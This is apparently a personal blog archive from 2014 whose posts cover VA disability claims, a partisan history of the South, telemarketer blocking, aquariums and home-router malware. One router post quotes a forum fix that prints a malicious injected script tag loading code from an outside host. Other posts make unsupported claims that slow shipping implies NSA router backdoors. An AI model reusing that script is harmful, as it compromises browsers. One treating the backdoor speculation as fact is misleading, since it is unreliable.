UA-9726592-1

Thursday, July 31, 2014

Veterans Disability Strategy


Many vets become aware of medical conditions that appear to be service connected. Often the vet will walk into the local Veteran Affairs  Regional Office and bring a physicians letter with them hoping to be awarded a disability rating in a few months.,

As most vets know, this approach will  usually results in a denial.


38 CFR Pensions, Bonuses, And Veterans Relief

What vet should have done is first is to review 38 CFR, Part C and work with the physicians to define his or her disability in VA terms. 

Disjunctive v. conjunctive ratings


If the Vet has Diabetes Mellitus , he or she should check out The Endocrine System, 4.119 - Schedule of Ratings - Endocrine System

The vet would find these ratings for Diabetes Mellitus

7913     Diabetes mellitus

            Requiring more than one daily injection of insulin, restricted diet,
            and regulation of activities (avoidance of strenuous occupational
            and recreational activities) with episodes of ketoacidosis or
            hypoglycemic reactions requiring at least three hospitalizations per
            year or weekly visits to a diabetic care provider, plus either
            progressive loss of weight and strength or complications that
            would be compensable if separately evaluated     100

            Requiring insulin, restricted diet, and regulation of activities with
            episodes of ketoacidosis or hypoglycemic reactions requiring one
            or two hospitalizations per year or twice a month visits to a diabetic
            care provider, plus complications that would not be compensable
            if separately evaluated     60

            Requiring insulin, restricted diet, and regulation of activities     40

            Requiring insulin and restricted diet, or; oral hypoglycemic agent
            and restricted diet     20
   
Manageable by restricted diet only     10
         
Note (1): Evaluate compensable complications of diabetes separately unless they are part of the criteria used to support a 100 percent evaluation. Noncompensable complications are considered part of the diabetic process under diagnostic code 7913.

Note (2): When diabetes mellitus has been conclusively diagnosed, do not request a glucose tolerance test solely for rating purposes.


Pay close attention to the notes and be aware that Diabetes Mellitus is rated conjucntivley. To be be rated 40 per cent, you have to meet all of the examples for the 10 and 20 per cent ratings as well.

Some endocrine rating are rating disjunctively. The top level ratings are inclusive of the lower level such as  DC 7903 which addresses Hypothyroidism 


7903 Hypothyroidism

Cold intolerance, muscular weakness, cardiovascular involvement,
mental disturbance (dementia, slowing of thought, depression),
bradycardia (less than 60 beats per minute), and sleepiness 100

Muscular weakness, mental disturbance, and weight gain 60

Fatigability, constipation, and mental sluggishness 30

Fatigability, or; continuous medication required for control 10


In The UNITED STATES COURT OF APPEALS FOR VETERANS CLAIMS (USCAVC), NO . 07-2728 DIANNE C. TATUM , APPELLANT (2009) argued successfully for a higher rating.  The USCAVC ruling explains disjunctive ratings.

The USCAVC agreed with Ms. Tatum on her entitlement to a higher disability rating. The USCAVC noted that all of the examples in DC 7903 did not need to be present for a higher level rating. The USCAVC said that the higher level examples in DC 7903 were inclusive of the lower level examples. 
Because this case was decided by a a panel of three judges, it is binding to the VA. 
Therefore, hypthyrodism is rated  disjunctively, unlike daibetes mellitus. 

 

Letters v. Disability benefits questionnaires


A veteran can get a letter from a a physicians, but Rightardia recommends the new Disability Benefits Questionnaires (DBQ) which provide more comprehensive information to the VA .

Below is a link to VA DBQs. 

it is important the physician check the box that indicates the Service Medical Records (SMR) have been reviewed. How can the physician connect the medical condition to service in the armed forces with reviewing the SMRs that the veteran should provide to the physician? 

After the SMRs are reviewed the physician should be able to write a nexus statement that connects the vet's medical condition to his or her service. This needs to be added as a remark to the DBQ,

Rightardia recommends you get a minimum of two DBQs: one from the primary care physician and one from a specialist. You should probably get a specialist diagnosis first that your primary car physicians will review before he or she completes their DBQ.


If the DBQ provides sufficient evidence, the VA may waive Compensation and Pension exam. Rightardia considers these exams redundant. Initially, the C&P doctors were funded to help indigent vets who couldn't get a private practice exam. Then the VA then required all vets to complete these exams which are often superfluous if a DBQ has been submitted.

 

Get the right attorney


Some legal firms will coach vets off the record on how to pass C&P exams and charge a fee. Rightrdia considers this unethical and unnecessary, If you get a proposal like this from an attorney, report the firm to the VAOIG.

If you need an attorney, use Avvo.com to find a top rated attorney on VA or military law in your locality. 

If you need some prepping for a C&P exams, you may want to peruse some of the VA physician and clinician guides. Most of these are older documents, but they are the most current Rightardia could find.

Disability Worksheets

Clinicians's Guide

CLINICIAN’S GUIDE MARCH 2002

Amazon: Old Physician's Guide

Subscribe to the Rightardia feed: http://feeds.feedburner.com/blogspot/UFPYA 

  Creative Commons License
Rightardia by Rightard Whitey of Rightardia is licensed under a Creative Commons Attribution 3.0 Unported License.

Permissions beyond the scope of this license may be available at rightardia@gmail.com.

Wednesday, July 30, 2014

Did slavery ever end in the US?



Many of people who came to US in the pre-colonial era were slaves. There were blacks who were forcibly brought to the US from Africa and white indentured servants.  Some of these indentured servants were prisoners and others were kidnapped. Many had 5-year terms but their contracts were bought and sold,  and some indentures never attained freedom.

The people who moved in the New England states and those in the South were different. One of the first people to chronicle the new nation was Alexis de Toqueville:
Caricature by Honoré Daumier, 1849.

The men sent to Virginia were seekers of gold, adventurers without resources and without character, whose turbulent and restless spirit endangered the infant colony ... Artisans and agriculturalists arrived afterwards...hardly in any respect above the level of the inferior classes in England. No lofty views, no spiritual conception presided over the foundation of these new settlements. The colony was scarcely established when slavery was introduced; this was the capital fact which was to exercise an immense influence on the character, the laws and the whole future of the South. Slavery...dishonors labor; it introduces idleness into society, and with idleness, ignorance and pride, luxury and distress.  .  . On this same English foundation there developed in the North very different character.

After the civil war, the US experienced the rise of the monopolists. Men like JP Morgan and John D Rockefeller controlled vast parts of the US economy with trusts. Many corporations has private armies of Pinkertons that patrolled factories to keep workers under control. There were many union riots after the Civil War and the government often used the army or national guard to suppress the strikes..

Striking workers in tent camps were even machine gunned. We celebrate Labor Day because of the infamous Pullman Strike of 1894. Thirty strikers were killed and 57 were wounded. Not really a cause for workers to celebrate.

The rise of labor and the trust busting efforts of Theodore Roosevelt and other progressives broke up the huge trusts. A middle class began to emerge in the US.

However, with the exception of Woodrow Wilson,the GOP controlled the White House up to the Great Depression and the election of the other Roosevelt, Franklin Delano.

After the allies were victorious  in World War 2, the New Deal continued. A housing and  education boom was stimulated by Veteran Administration benefits. Seniors could now enter into their golden years without fear of poverty, courtesy of Social security.


US public education was perhaps the best in the world at this time. One of three workers in the US was in a union. Only about one in 30 Americans was wealthy because Roosevelt funded the war with taxes on the affluent. He had no choice. This was the best of times for the middle class and their children, the Baby Boomers.


Then John F. Kennedy started fiddling with the income tax rate for top earning Americans.

This was when the New Deal started to unravel. Ronald Reagan finished the job when he cut the top tax rate to 28 per cent. These cuts fractured the middle class. Because of the draconian income  tax cuts, Reagan had to subsequently raise taxes 11 or 12 times.

Women also had to leave home and take jobs to make ends meet. Another wave of feminism began in the workplace. Schools and the public infrastructure started a long decline due to cuts in federal spending while defense spending increased.

So the best of times that started about 1946 and continued until about 1980. The US had a strong middle class, strong unions, an improved infrastructure and good public school system.

The big events that probably brought down the Democratic party were the Civil Rights Acts of the mid-sixties and the Vietnam War.

Southern Democrats called Dixiecrats left the Democratic party. Many retired and other became Republicans during the next 10 years These Dixiecrats had more to do with the rise of the GOP in the South than anything the Republicans did politically, contrary to the musings of Newt Gingrich. 

LBJ thought it would take the Democratic Party 10 years to recover, but it was closer to three decades.

The economic situation the South is still Topsy Turvy after 150 years  As the Daily Kos has written, the South has become one big poverty belt.


Slavery continued to exist in the US on plantations until the 1950s. The southern elite played poor working class whites against blacks, suggesting that the poor white's economic conditions were caused by black welfare programs rather than by the unequal income distribution in the southland.

Unions were kept out of the south and right to work laws were passed to repress workers. Essentially, slavery never really ended in the land of low wages, the south.

The old plantation owners were the basis of new white elite. Poor whites still operated the slave patrols for their corporate owners . Blacks became the bogeymen in this region, the cause of all that ailed the south. Jim Crow laws were passed to suppress black votes.

The conservatives have maintained control of the south since before the Civil War. It's the conservative politics that are largely to blame for the southern poverty today.

Rightardia has seen countless surveys in which the southern and red states lag behind the blue states. Education attainment, teen pregnancy, VD rates, food stamp use, and income levels all lag behind other regions of the country.

It if wasn't for food stamps.other welfare programs and  military payrolls in the red states, the region would even be more depressed.

Democrats know that the most of the red states are recipient states who receive more in federal funds form the government than they pay in taxes. 

Have things really changed in the south from the Ante Bellum era?

It seems there is still the same three tiers of owners, white indentured workers and marginalized black men and women.

sources: 

https://en.wikipedia.org/wiki/Indentured_servant

https://en.wikipedia.org/wiki/Alexis_de_Toqueville

http://www.dailykos.com/story/2014/07/02/1311236/-The-South-is-America-s-poverty-belt-and-Republicans-want-to-make-all-of-America-more-like-the-South

https://en.wikipedia.org/wiki/Pullman_strike

Subscribe to the Rightardia feed: http://feeds.feedburner.com/blogspot/UFPYA 

  Creative Commons License

Rightardia by Rightard Whitey of Rightardia is licensed under a Creative Commons Attribution 3.0 Unported License.

Permissions beyond the scope of this license may be available at rightardia@gmail.com.

Thursday, July 24, 2014

How to stop telemarketers cold.



In the past telemarketers hounded my home day and night. Registered with the the National Do Not Call Registry and also installed a CPR Call blocker. It got great reviews on Amazon.com and it was worth the wait for the UK shipment.

In the last couple of months, the telemarketer calls started again. This time the calls came in as "unavailable" and with phone numbers starting with a "V." The CPR Call blocker has some  codes you can enter into your phone after the call terminates to block that last call.

So I started blocking these bogus calls, but the telemarketer onslaught continued.

Did some research and found that the local telephone company has star (*) codes you can enter on your phone to block anonymous calls. Star (*) 77 works on the both the BrightHouse and Verizon phone networks.
 BrightHouse Star phone codes

Each phone company has different codes. These are the codes for Verizon.

Verizon Star phone codes

Also discovered that the State of Florida has a Do Not Call Registry as well. You can register both you landline and cell phone on the national and Florida Do not call registries.



These registries do not block charities, political calls or businesses that you have and established relationship with. There are other exceptions as well. The national do Not Call Registry will last lifetime and as long as you don't a change your phone number or move. The FL state registry is good for 5 years. 

If you want to stop telemarketers cold, fist use you phone's star codes to block anonymous calls. register your phones with both the state and national Do Not Call registries and purchase a call blocker for your home phone. The CPT call blocker, for example, has many blacklisted phone numbers already built into it and it can block an additional 1000 numbers.

Some phones have call blocking technology built into them. My Panasonic DECT 6.0 plus wireless phone can block up to 30 calls and that may do the trick if you only get an occasional unwanted call.

You can stop telemarketers cold by enabling the anonymous call block feature with you phone company. That's  *77 for both BH and Verizon. Turn on both the FL and national Do Not Call registries. Purchase a call blocker phone system that will allow you to black the occasional local that slips through your telemarketer defense system.

Some phones have the call block feature built into them.

So far so good. Only two unwanted calls today and one was political.


 
Subscribe to the Rightardia feed: http://feeds.feedburner.com/blogspot/UFPYA 

  Creative Commons License

Rightardia by Rightard Whitey of Rightardia is licensed under a Creative Commons Attribution 3.0 Unported License.

Permissions beyond the scope of this license may be available at rightardia@gmail.com.

Tuesday, July 15, 2014

The Gangsta' of Capitlaism

 Some  things change slowly. 

Subscribe to the Rightardia feed: http://feeds.feedburner.com/blogspot/UFPYA 

  Creative Commons License

Rightardia by Rightard Whitey of Rightardia is licensed under a Creative Commons Attribution 3.0 Unported License.

Permissions beyond the scope of this license may be available at rightardia@gmail.com.

Friday, July 4, 2014

Is the aquarium hobby expensive?

Many people stay away from aquariums because they consider the hobby to be too expensive.  it can be expensive if you go to a pet store and buy a new aquarium stand, filter, food pumps,  and accessories. There are also ways to have an an aquarium at low cost.

The low cost solution  is buy a used aquarium. You can find them in the classified ads and Craig List. Many aquariaists move or the partner dies who maintains the aquarium. Often the person who is selling the aquarium is just looking for a good home for their fish. Used aquariums can be purchased for a small percentage or the original cost, often around 10 per cent.

Often apartment managers will find abandoned aquariums when people move out with live fish in them. They will call aquarium stores to remove the aquariums and fish. Many of these stores sell used aquariums and related equipment.

This hobby is more for the homebody, Just like any other pet such as a cat or a dog, the fish must be cared for when you go on a long trip or a vacation. However, you can't put fish in a kennels. Someone must come into you home to check the tank, add water and feed the fish if you haven't purchased an auto- feeder.

The first question is what kind of aquarium do you want,fresh or salt water? Salt water are more expensive and somewhat harder to maintain. However, the salt water fish,invertebrates and corals are more colorful and interesting. Some saltwater reefs tanks are spectacular.
 freshwater cichlid

Salt water fish are  more colorful, but there are some fresh water species that rival the saltwater fish. There are some genetically engineered species that rival the saltwater colors. 


Fresh water species: the Cardinal and genetically engineered fish that glow in the dark

Salt water fish provide a riot of color. The invertebrates are also interesting: starfish, crabs, soft corals and anemones to name a few. A saltwater reef tank can be a site to behold


salt water reef tank

So assuming you have been able to find a low cost used aquarium system, where do you go from here? You may want to hire an aquarium specialist or tech to help you set up the tank, particularly if it is salt water. 

You can use tap water in a fresh water aquarium as long as you add a dechlorinator to the water such as Amquel when you fill the tank. In general it a good idea to let fresh water stand for at least 72 hours when you fill the new tank. The other alternative is to try an salvage as much s the old aquarium water as possible and fill the tanks with the original water. Slowly introduce the new water from the tap and add the dechlorinater.

The best water to use in either saltwater or freshwater aquarium is reverse osmosis (RO) water, rain water or distilled. Fish will often breed after you introduce rain water into an aquarium. Use a large cone funnel with a paint filter to filter the rain water before you put it in the tank.

Have also used filtered rain water in salt water tanks, too, with no ill affect. Hoverer, RO water is what most aquarium people and techs use. Distilled water can also be used in a saltwater tank. 

When you purchase a used tank you will get a lot of accessories such as pumps,water filters, nets, chemicals and test kits. One thing not to skim on is fish food. Some of the better brands are Hikari and Spectrum.  Goldfish food is not recommended for fresh or saltwater fish.  

Aquarium filters are important because they keep the water clear. Fresh water filter filter often  hang on the top of the tanks thee are also sealed units that fit under tanks. These filter are generally not suitable for salt water tanks. Most salt water tanks use a sump under the tank for filtration.

Fresh water filters

Salt water aquarium sump

Lights are very important for an aquarium.In general a fresh water aquarium will do well with fluorescent grow lights. Hydroponic lights work fine and may be cheaper than aquarium lights. Such fixtures uses T8 fluorescents in the 6500k-7000k (Kelvin)range. 

You can use T8 fluorescent lighting the 10,000K to 20,000K ranges but halogen lights are more commonly used in saltwater aquariums. Halogen lights are hot and should be suspended above the aquarium rather than used under an aquarium hood when possible. 

A better option for a salt water tank is the new LED lights. Radion lights are great, but expensive. There are lights on Amazon an Ebay that are far less expensive. Aquamana and LG-LED Solutions and make good lights. Bought a LG-LED array on Ebay that costs about $90.

Make sure the LED light has 120 degree or 90 degree LEDS and also check the surface area that the light can cover. Some of these lights can be daisy changed which reduces the number of plugs into receptacles.

New LED aquarium lights

If you want an aquarium in your home, you have been provided some options to keep the costs down.  Buy a used setup, not new. Use filtered rainwater to keep the water costs down. Buy the new and less expensive LED lights to brighten your aquarium.


Subscribe to the Rightardia feed: http://feeds.feedburner.com/blogspot/UFPYA 
  Creative Commons License

Rightardia by Rightard Whitey of Rightardia is licensed under a Creative Commons Attribution 3.0 Unported License.

Permissions beyond the scope of this license may be available at rightardia@gmail.com.

Thursday, July 3, 2014

Purchasing a secure router on the Internet can be risky



Take care where you purchase a router with improved security firmware. 

I use a DD-WRT router in my home to keep hackers at bay, both white hat and black hat.

Some  black hat hackers in Estonia developed DNSChanger malware that changes the DNS addresses and routers to rogue DNS servers that redirect your web queries to spoofed financial and retail sites to harvest credit card numbers and bank account passwords.

The white hat hackers who work for the government think they are protecting America by bugging routers and watching your email and Internet posts on Facebook.

In the past most of these white hats worked for NSA. Today with the advent of Homeland Security, local law enforcement has also gotten into the white hat fray. These locals are the people who concern Rightardia.

Expedited delivery? 


After the DD-WRT router started acting up, two Tomato routers were ordered form SunnyVIOP in Watertown,NY. The router was picked up by Fedex on Monday at 3:01 pm.

Most Amazon orders arrive in two to three days. Expected the routers  would be delivered today (Thursday) because Rightardia paid more that $16 for expedited delivery.

Yet, the Fedex tracker claimed the router wouldn't be delivered until the following Monday because the delivery would be completed through the Fedex' SmartPost, the US Postal service.

SmartPost sounds like a bad idea.  It should be called DumbPost.

Does this sound strange that a  router would take more than three more working days to be be delivered from Orlando which is less than 1.5 hours from Palm Harbor?

According to Ed Snowden, the government has been bugging IT equipment. In
view of the long delivery time, it is likely the Tomato routers will have NSA backdoors in them for government purposes.

Apparently, the government is bugging home routers, too.

Plan to RMA the routers back to  SunnyVOIP in Watertown,NY because the units will have been compromised by the time they arrive. If the government can hack my routers, so can the black hats.

This is the main reason I don't use MS Windows, the Swiss cheese of operating systems (OS). The government pays MS big bucks for MS to engineer back doors into their OS.

Looks like I will have to buy some new routers locally and roll my own by upgrading them with Tomato firmware.


 Subscribe to the Rightardia feed: http://feeds.feedburner.com/blogspot/UFPYA 
  Creative Commons License

Rightardia by Rightard Whitey of Rightardia is licensed under a Creative Commons Attribution 3.0 Unported License.

Permissions beyond the scope of this license may be available at rightardia@gmail.com.

Tuesday, July 1, 2014

More on router malware that hacks Gmail and installs bogus passwords in your browser.


Rightardia reported earlier that both the Linksys and Netgear routers can be infected with malware that is called DNSChanger and is supposedly a variant of Zlob malware.   The Linksys router was a WND3700V4 that had been flashed with DD-WRT firmware, that is supposed to be more secure than commercial firmware.

Rightardia changed the password in the router. This did not fix the problem. Also tried port forwarding by redirecting port 80 to port 8080. That didn't work either.

Virus scans on all of the PC in the network followed. The malware infection was surprising because our network is Linux based, Today we discovered something interesting.

We use a password browser plugin for password manager that saves the passwords to the Linux Mint home directory. The same password manager account is used by both browsers. Use this plugin in both the FireFox and the Chrome browser. Oddly the password manager for the FireFox browser worked, but not in Chrome.


Decided to check the browser's passwords. I found no problems in Chrome but Mozilla's FireFox was different matter. Had two passwords that shouldn't be there. One password was for Gmail which the password manger uses to authenticate. The other password was for the router at IP address 192.168.1.1. Both used the bogus password d6nw5v1x2pc7st9m.

Neither bogus password worked with Gmail or the router. However  had changed the router password long ago and then immediately changed my Gmail password today. it is possible that hackers have developed a technique to piggy back of of existing passwords with a secondary password.


Check your browser's saved passwords in Firefox' Settings | Security.

Recommend you delete the bogus passwords form your 'saved passwords" list. Also, change both your router's password and Gmail password if you you find any extra browser passwords. Also recommend changing the router's IP address form 192.168.1.1 to another address on your 192.168.1.0 network.

Disable web GUI management and  require HTTPS (secure) connections to your router for configuration changes.

This malware MO suggests the router malware is used to create a botnet. In a botnet, the"zombie master"  hacker will direct the 1000's of bots to ping a certain IP address that results in a denial of service attack (DDOS).

So far my router and Internet is functioning normal.

Knock on wood!  

The hacker that invented the router exploit must quite exceptional. Very ingenious.

Subscribe to the Rightardia feed: http://feeds.feedburner.com/blogspot/UFPYA 
  Creative Commons License

Rightardia by Rightard Whitey of Rightardia is licensed under a Creative Commons Attribution 3.0 Unported License.

Permissions beyond the scope of this license may be available at rightardia@gmail.com.

Monday, June 30, 2014

Veteran Affairs effective date appeals



There are many federal directives on the effective date of a VA claim. This is a complex area and you may need an attorney if you appeal to the Board of Veteran Appeals (BVA) on you effective date of a claim.

Before you submit an appeal for an effective date change, become familiar with these federal directives and court cases,


Directives and rulings:
1. 38 CFR, Part C, §3.156(b) and §3.156(c)(3) & (4)
2. 38 C.F.R. § 3.400 (o)(2) and (b)(2)(i)
3. McGrath v. Gober, 14 Vet. App. 28, 35 (2009)
4. DeLiosio v. Shinseki, 25 Vet. App. 45, 56 (2011)
5. 38 U.S.C. § 5110 9b)(2) and (b)(3)(A)
7. Clemons v. Shinseki, 23 VET.App. 1, 5 (2009).
8. Harris v. Shinseki, no. 2012-7111 (Fed. Cir. Jan. 4, 2013)
9. 119 congressional record, 17,571(1973). Pub L no. 93-177

 

Askniod wrote an excellent article on this topic.   In summary: 

. . . [o]nce an effective date has become final due to the failure of a claimant to appeal it, a claimant’s only recourse is to have the final decision revised on the grounds of clear and unmistakable error (CUE).

This means if you receive a VA regional Office (VARO) ruling denying your claim, you have one year to appeal it to the Decision Revue Officer (DRO) or the BVA. if you fail to do this, the effective date issue becomes moot. 

However, if the VA regional Office (VARO) fails to issue a Supplementary Statement of Case (SSOC), the Case is still considered open or unfinished under 38 CFR §3.160. 

An SSOC denies the claim and provides  the VA's rationale for the denial. It also provides procedures for appealing the DRO or the BVA. 

Appeal to BVA on a VA Form 9. There was a new 21-series form for DRO appeals, too, but Rightardia was not able to find any information on that form. You should not use a Form 9 to appeal to the DRO. 

Say that you are representing yourself pro se and the VARO sends you a ruling, but forgets to issue an SSOC. essentially, you were not advised or your right to appeal and the VA failed its Veterans Claim Assistance Act (VCAA) duty to assist. 

This is a worst case scenario for the VA if you file pro se because they can not blame a veteran service officer (VSO) form the DAV or the Amvets for the oversight, 

The bottom line is if the VA failed to advise you of you right to appeal, the claim is considered open or unfinished from the the day the original or subsequent related claims for the medical condition were submitted, 

Whats in your wallet could be a lot of VA government money if the VARO failed to issue an SSOC several years ago. 

Check your c-file and home files for old SSOCs if you have opened a new claim for a medical condition that was denied in the past.



Subscribe to the Rightardia feed: http://feeds.feedburner.com/blogspot/UFPYA 

  Creative Commons License

Rightardia by Rightard Whitey of Rightardia is licensed under a Creative Commons Attribution 3.0 Unported License.

Permissions beyond the scope of this license may be available at rightardia@gmail.com.

Sunday, June 29, 2014

Saturday, June 28, 2014

Home routers can be infected with malware


IT pros  have found a malicious worm that has infected  different home and small office Linksys routers, including the E1000, the E1200, and the E2400.

Then there is also an Asus firmware vulnerability: An IT researcher named Kyle Lovett also found a vulnerability in a number of heavy duty Asus routers that had faulty firmwares.

Rightrdia has recommended DD-WRT firmware enabled routers in the past. However, this vulnerability also affects some routers with DD-WRT firmware. A Netgear Wnd3700V4 router that Rightardia uses appears to have been infected with this malware and firmware upgrades and a configuration default did not eliminate the problem.

Sunbelt Software also reported  that a Buffalo router that provisioned with DD-WRT firmware was pulled out of a retail box and easily infected with the router malware.

A Washington Post article stated:

". . . Sunbelt was able to confirm that the malware successfully changed the DNS settings on a Linksys router (model BEFSX41), pulled straight out of the factory box (with the default username and password). Another test showed that the Zlob variant successfully changed the DNS settings on a Buffalo router running the DD-WRT open source firmware.

Sunbelt also found that if there are multiple machines using the same router, all of the systems connected to that router will have their traffic hijacked."

DD-WRT recommends  to disabling the graphical user interface on the router and change the admin login and use a stronger password. DD-WRT has also suggesting defaulting the config will eliminate the worm.

Rightardia discovered that re-flashing the router or defaulting the configuration did not work.

We did find this information in a forum.
.
"If you got the problem that in every loaded page appears a javascript tag like <script language="javascript" SRC="http://mx.content-type.cn:443/day.js"></script> this is the solution for your problem.

The cause is a trojan horse (virus) on another computer in your network!
This other computer is telling your PC that it is the gateway to the Internet by modifying its hardware address (MAC). Your computer is in consequence sending all traffic to the infected PC which forwards it to the Internet and filters it in order to put its malicious code.

You can find out which computer is the evil one by typing following into your command line:

arp -a

In the appearing table search for a double assigned physical address which is once assigned to the gateway IP address and once assigned to another IP.
 

Find out which computer is the other IP and you will have the virus host.
Scan that one for virus and malware (we are just about to conduct that scan)."


The best option at this point would be to replace an infected  router with Tomato firmware installed. If your home router is not infected, disable remote access and change the login ID and password. Use a complex password that would not respond to a brute force dictionary attack.

You can purchase  a Tomato enabled router form Amazon. The NetGear WNR3500L Rangemax Wireless-N Gigabit Router with Tomato VPN firmware (Refurbished) appears to be a good option. 

Rightardia would expect DD-WRT to release new firmware to fix this problem in the immediate future. 

a


 http://arstechnica.com/security/2014/02/bizarre-attack-infects-linksys-routers-with-self-replicating-malware/

https://www.flashrouters.com/blog/2014/02/19/asus-linksys-router-firmware-hacked-stay-safe-dd-wrt-tomato/

http://voices.washingtonpost.com/securityfix/2008/06/malware_silently_alters_wirele_1.html

http://topfueber.de/2008/07/mxcontent-typecn443-nice-trojan-how-to-get-rid-of-it/#english


Subscribe to the Rightardia feed: http://feeds.feedburner.com/blogspot/UFPYA 

  Creative Commons License

Rightardia by Rightard Whitey of Rightardia is licensed under a Creative Commons Attribution 3.0 Unported License.

Permissions beyond the scope of this license may be available at rightardia@gmail.com.